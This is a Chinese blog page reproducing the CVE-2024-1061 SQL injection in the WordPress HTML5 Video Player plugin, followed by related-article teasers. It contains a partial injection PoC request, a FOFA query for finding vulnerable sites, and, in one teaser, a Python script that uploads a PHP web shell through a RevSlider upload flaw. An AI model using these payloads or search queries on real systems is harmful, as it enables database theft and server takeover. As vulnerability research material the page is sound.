WordPress Plugin HTML5 Video Player SQL注入漏洞复现(CVE-2024-1061)

已于 2024-02-04 20:10:35 修改
阅读量1k 收藏
点赞数 1
分类专栏: 漏洞复现v1 文章标签: sql web安全 安全
于 2024-02-04 20:10:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136031565
版权
本文详细介绍了WordPress Plugin HTML5 Video Player的CVE-2024-1061 SQL注入漏洞,包括漏洞概述、影响范围、复现环境和修复建议。攻击者可通过该漏洞获取数据库敏感信息,甚至执行恶意代码。建议受影响用户尽快更新到2.5.25及以上版本以修复漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin HTML5 Video Player 插件 get_view 函数中 id 参数存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

HTML5 Video Player < 2.5.25

0x04 复现环境

FOFA:"wordpress" && body="html5-video-player"

0x05 漏洞复现

PoC

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1&#
了解本专栏 订阅专栏 解锁全文 超级会员免费看
WordPress Plugin HTML5 Video Player SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-01 255
WordPress Plugin HTML5 Video Player SQL注入漏洞(含批量验证poc)
复现WordPress html5-video-player SQL 注入漏洞_39
fushuang333的博客
02-04 1023
复现WordPress html5-video-player SQL 注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
墨者WordPress插件漏洞分析溯源
wswr的博客
03-18 1216
总结:整个流程就算发现这是wordpress然后用专门的wpscan去扫漏洞,然后发现的了插件漏洞,然后利用整个插件漏洞来植入后门,然后获取key文件 思路:尝试绕过登录,进入页面发现不行,然后面向搜索引擎学习,看别人的做法 这个老哥的做法和流程应该是没问题,只是到了那个要翻墙的环节我应该就不行了 WordPress插件SQL注入漏洞——漏洞复现_W小哥1的博客-CSDN博客_wordpress注入漏洞 于是我又看了这个老哥 墨者学院 - WordPress插件漏洞分析溯源_多崎巡礼的博客-CSD
WordPress Plugin HTML5 Video Player SQL注入漏洞(含批量验证poc)(1)
m0_59117112的博客
04-15 327
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~漏洞编号:CVE-2024-1061。影响资产数量:24,801。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
MYSQL 高级 SQL 技巧
_binlong的博客
06-03 441
这些高级技巧可以根据实际需求灵活组合使用,以解决复杂的 SQL 查询和数据处理问题。以下是一些高级 SQL 技巧,可以帮助优化查询、提高性能并解决复杂的数据处理问题。窗口函数允许在查询结果的行上进行计算,而不会减少行数。动态 SQL 允许在运行时构建和执行 SQL 语句,适用于灵活的查询需求。现代数据库支持 JSON 数据类型和相关函数,方便存储和查询半结构化数据。临时表和公共表表达式(CTE)可以简化复杂查询,提高可读性和性能。创建合适的索引可以显著提高查询性能,尤其是在大表上。
开源数据库MySQL 与 PostgreSQL的巅峰对决。
dql5251的博客
06-01 886
MySQL与PostgreSQL深度对比分析 两大开源关系型数据库的核心差异体现在架构设计、功能特性和性能表现上。PostgreSQL采用ORDBMS架构,支持强ACID事务、高级SQL特性和丰富扩展(如PostGIS),在复杂查询、JSON处理和GIS应用中表现优异。MySQL则以轻量级设计见长,适合简单CRUD和高并发读场景。性能测试显示,PostgreSQL在写入吞吐(快90%)和复杂查询稳定性上更具优势,而MySQL在资源消耗和简单查询响应上更佳。选型建议:金融/GIS等强一致性需求选Postgre
SQL进阶之旅 Day 18:数据分区与查询性能
在未来等你的专栏
06-06 570
数据分区是指将一个逻辑上的大表按照某种规则(如范围、列表或哈希)划分为多个物理存储单元(分区)。每个分区可以独立存储和管理,从而减少单次查询需要扫描的数据量,进而提高查询效率。范围分区(Range Partitioning):根据列值的范围划分分区。列表分区(List Partitioning):根据列值的离散集合划分分区。哈希分区(Hash Partitioning):根据哈希函数的结果划分分区。组合分区(Composite Partitioning):结合多种分区策略,如范围+哈希。
NoSQL 之Redis哨兵
最新发布
YUNYINGXIA的博客
06-06 345
在分布式系统中,Redis 作为高性能键值存储中间件,其可用性至关重要。单节点 Redis 存在单点故障风险,一旦宕机将导致缓存层失效,甚至引发级联故障。为解决这一问题,Redis 引入哨兵模式(Sentinel),通过轻量级的监控与自动故障转移机制,保障 Redis 服务的高可用性。哨兵节点协作流程主节点故障后,哨兵通过ping命令检测到主观下线,触发quorum投票机制确认客观下线。基于 Raft 算法选举领导者哨兵,确保唯一执行故障转移的节点。
SQL进阶之旅 Day 16:特定数据库引擎高级特性
在未来等你的专栏
06-05 828
今天我们学习了MySQL、PostgreSQL和Oracle的高级特性及其应用场景。这些功能不仅解决了特定场景下的技术难题,还为后续性能优化奠定了基础。下一天的内容预告:Day 17——大数据量查询优化策略。掌握MySQL JSON字段的操作方法。学会使用PostgreSQL分区表提升查询性能。理解Oracle物化视图的工作机制。能够根据业务需求选择合适的数据库高级特性。
NoSQL之Redis配置与优化
2501_91114776的博客
06-05 594
定义:关系数据库(Relational Database)是基于关系模型(Relational Model)的数据库,使用表格(表、行、列)的结构存储和管理数据。数据之间通过主键(Primary Key)和外键(Foreign Key)建立关联。特点:数据以严格的二维表形式存储,遵循预定义的模式(Schema)。使用结构化查询语言(SQL)进行数据操作和查询。
SQLAlchemy 中的 func 函数使用指南
★匆匆★的专栏
06-06 161
func是模块中的一个特殊对象,它作为 SQL 函数的命名空间使用。当你访问func的属性时,SQLAlchemy 会创建一个对应的 SQL 函数调用。# 为函数结果指定列名).all()# 定义自定义函数类# 定义编译规则return "my_random()" # 调用PostgreSQL中的自定义函数# 使用自定义函数。
数据库系统概论(十四)详细讲解SQL中空值的处理
2402_83322742的博客
06-02 1035
本文介绍了SQL中空值(NULL)的处理方法。空值表示未知、不存在或无意义的数据,不能直接用"="判断,需使用"IS NULL"或"IS NOT NULL"。空值的产生包括主动插入、更新设置和外连接查询。文中强调了主键字段的非空约束,并详细讲解了空值在算术运算(结果为NULL)、比较运算(结果为UNKNOWN)和逻辑运算中的特殊处理规则。最后通过查询示例展示了如何正确筛选包含空值的数据记录。该内容为数据库查询中处理空值问题提供了实用指导。
SQL基础教程》第五章 SQL进阶之路:掌握高级查询的核心技巧
小庞的博客
06-06 324
SQL高级查询核心技巧: 1️⃣ 子查询:解决动态参照问题(如筛选高于部门平均薪资的员工),注意关联条件和性能优化 2️⃣ 多表连接: INNER JOIN查交集(订单关联用户) LEFT JOIN保左表全量(统计所有用户订单) 需严格避免笛卡尔积 3️⃣ 数据处理函数:字符串拼接、日期计算、NULL值处理等 4️⃣ 进阶技巧: DISTINCT去重 UNION合并结果集 窗口函数实现分组排名 CASE WHEN行转列 ⚠️ 优化建议:JOIN字段建索引、限制子查询嵌套层数、始终明确连接条件
PostgreSQL 在生物信息学中的应用
belldeep的专栏
06-02 801
PostgreSQL 在生物信息学中的应用
PostgreSQL配置文件修改及启用方法
leo__520的博客
06-04 325
这个文件通常位于PostgreSQL的数据目录中,例如在Linux系统中,它可能位于"/var/lib/pgsql/data"或"/usr/local/pgsql/data"。PostgreSQL是一种强大的开源对象关系数据库系统,它使用并扩展了SQL语言,结合了许多安全性、稳定性、完整性、和事务性(ACID)的特性,使其成为许多企业和开发者的首选数据库系统。在Windows系统中,你可以在"服务"管理工具中找到"postgresql"服务,然后点击"重启"。选项,然后将其修改为。
vanna+deepseek+chainlit 实现自然语言转SQL的精度调优
喵酱
06-06 180
vanna+deepseek+chainlit 实现自然语言转SQL的精度调优
SQL 中的 `CASE WHEN` 如何使用?
hixiaoyang的博客
06-02 285
SQL中的CASE WHEN是强大的条件表达式,支持两种写法:简单CASE(匹配特定值)和搜索型CASE(使用条件判断)。典型应用包括数值标签转换(如分数转等级)、条件计算(如部门薪资调整)和特殊排序(如自定义性别排序)。它能用于SELECT、WHERE、ORDER BY等子句,但必须用END结尾,支持嵌套使用。需要注意的是,它只能返回表达式值而不能动态修改列名。这个功能相当于SQL中的if-else逻辑,是数据处理时灵活分类的有力工具。
CVE-2024-25600复现
02-12
### 复现 CVE-2024-25600 WordPress 远程代码执行漏洞 为了安全研究的目的,以下是关于如何复现 CVE-2024-25600 漏洞的方法。请注意,在未经授权的情况下对任何系统进行攻击性操作均属于违法行为。 #### 准备工作环境 确保拥有一个隔离且受控的实验环境来测试此漏洞。建议使用虚拟机或容器化工具创建独立于生产网络的安全实验室设置[^3]。 #### 安装受影响版本的WordPress 下载并安装存在该漏洞的具体版本号下的Wordpress程序实例。可以通过官方渠道获取历史发行版来进行部署: ```bash wget https://wordpress.org/wordpress-<vulnerable-version>.tar.gz tar -xzvf wordpress-<vulnerable-version>.tar.gz mv wordpress /var/www/html/ chown -R www-data:www-data /var/www/html/wordpress ``` #### 配置Web服务器 配置Apache或其他web服务端软件以支持PHP解析功能,并指向上述路径作为站点根目录;同时开启必要的模块如`mod_rewrite`以便正常访问网站前端页面。 #### 利用漏洞条件准备 根据已知情报描述,确认目标环境中满足触发条件所需的一切前置要素——这可能涉及到某些插件启用状态、主题选择等因素影响最终能否成功利用该缺陷实现远程命令注入行为。 #### 执行PoC脚本 一旦所有准备工作完成,则可以尝试编写简单的Python脚本来模拟恶意请求发送过程,从而验证是否存在可被利用之处。下面给出一段概念证明性质(PoC) 的代码片段用于说明目的(实际应用时需自行调整参数): ```python import requests url = "http://localhost/wp-admin/admin-ajax.php" data = { 'action': 'revslider_ajax_action', 'client_action': 'update_plugin' } files = {'update_file[]': ('shell.php', '<?php phpinfo(); ?>')} response = requests.post(url, data=data, files=files) if response.status_code == 200 and b'Update was successful.' in response.content: print("[+] Shell uploaded successfully!") else: print("[-] Failed to upload shell.") ``` 这段代码试图通过向 `admin-ajax.php` 发送 POST 请求并将 PHP 文件上传到服务器上来利用 RevSlider 插件中的任意文件上载漏洞。如果一切顺利的话,应该能够在指定位置找到名为 `shell.php` 的 WebShell 后门文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值